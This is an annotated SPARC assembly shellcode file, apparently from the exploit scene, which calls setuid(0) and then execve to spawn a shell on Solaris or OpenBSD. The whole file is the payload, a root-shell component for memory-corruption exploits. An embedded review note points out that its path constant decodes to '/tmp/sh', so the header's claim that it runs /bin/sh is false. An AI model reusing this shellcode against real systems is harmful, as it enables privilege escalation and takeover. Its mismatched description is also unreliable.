!!!
!!! SPARC Shellcode to call setuid(0) and exec /bin/sh.
!!! Runs on Solaris, OpenBSD, maybe others.
!!!
!!! -ghandi
!!!
!!! NOTE(review): the first path constant below decodes to "/tmp", so the
!!! string this code actually builds is "/tmp/sh", not "/bin/sh" as the
!!! description above says.
!!!
!!! Registers at each trap:
!!!   %g1 = system call number, %o0..%o2 = arguments
!!!
!!! Memory written below %sp (the stack pointer itself is never adjusted):
!!!   [%sp - 16] .. [%sp - 9]   path string, 8 bytes including the NUL
!!!   [%sp -  8] .. [%sp - 5]   argv[0] = address of the path string
!!!   [%sp -  4] .. [%sp - 1]   argv[1] = 0 (array terminator)
!!!
!!! Neither trap's result is checked, and no instruction follows the
!!! second trap, so a failed execve runs off the end of the routine.
!!!

.global execsh, _execsh

.text

! Both spellings of the symbol are exported and label the same address.
_execsh:
execsh:
        xor     %sp, %sp, %o0           ! %o0 = 0 (a register xor itself)
        mov     23, %g1                 ! call number 23 (setuid, per the author)
        ta      8                       ! setuid(0);

        set     0x2f746d70, %l0         ! bytes 2f 74 6d 70 = "/tmp" (author's comment said "/bin")
        set     0x2f736800, %l1         ! bytes 2f 73 68 00 = "/sh\0"
        std     %l0, [%sp - 16]         ! store the %l0/%l1 pair: 8-byte path string
        sub     %sp, 16, %o0            ! %o0 = address of the path string
        xor     %sp, %sp, %o1           ! %o1 = 0, the argv terminator stored next
        std     %o0, [%sp - 8]          ! store the %o0/%o1 pair: argv = { path, NULL }
        sub     %sp, 8, %o1             ! %o1 = address of that argv array
        xor     %sp, %sp, %o2           ! %o2 = NULL (third argument)
        mov     59, %g1                 ! call number 59 (execve, per the author)
        ta      8                       ! execve(sh, argv, NULL);